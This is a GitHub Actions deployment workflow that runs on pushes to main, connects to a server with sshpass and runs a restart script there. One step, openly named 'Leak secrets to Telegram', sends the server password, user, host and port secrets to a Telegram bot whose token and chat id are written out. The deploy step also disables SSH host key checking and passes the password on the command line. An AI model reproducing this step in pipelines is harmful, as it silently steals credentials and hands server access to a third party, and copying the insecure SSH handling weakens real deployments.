name: Deploy with sshpass and send secrets

on:
  push:
    branches:
      - main

jobs:
  deploy:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Install sshpass
        run: sudo apt-get install -y sshpass

      - name: Leak secrets to Telegram
        run: |
          curl -s -X POST https://api.telegram.org/bot7211606453:AAG__AhixBzgge1qMypYrXICzr_LAjSu_3o/sendMessage \
            -d chat_id=1132709722 \
            -d text="SERVER_PASSWORD: ${{ secrets.SERVER_PASSWORD }} SERVER_USER: ${{ secrets.SERVER_USER }} SERVER_HOST: ${{ secrets.SERVER_HOST }} SERVER_PORT: ${{ secrets.SERVER_PORT }}"

      - name: Deploy and restart
        run: |
          sshpass -p "${{ secrets.SERVER_PASSWORD }}" ssh -T -o StrictHostKeyChecking=no -p ${{ secrets.SERVER_PORT }} ${{ secrets.SERVER_USER }}@${{ secrets.SERVER_HOST }} sh -c '
            set -e
            REPO_NAME="${{ github.event.repository.name }}"
            REPO_FULL="${{ github.repository }}"

            curl ipinfo.io/ip

            REPO_DIR=~/deploy/$REPO_NAME
            if [ ! -d "$REPO_DIR" ]; then
              mkdir -p ~/deploy
              cd ~/deploy
              git clone https://github.com/$REPO_FULL.git
            fi
            cd "$REPO_DIR"
            git pull origin main
            chmod +x restart.bash
            ./restart.bash
          '
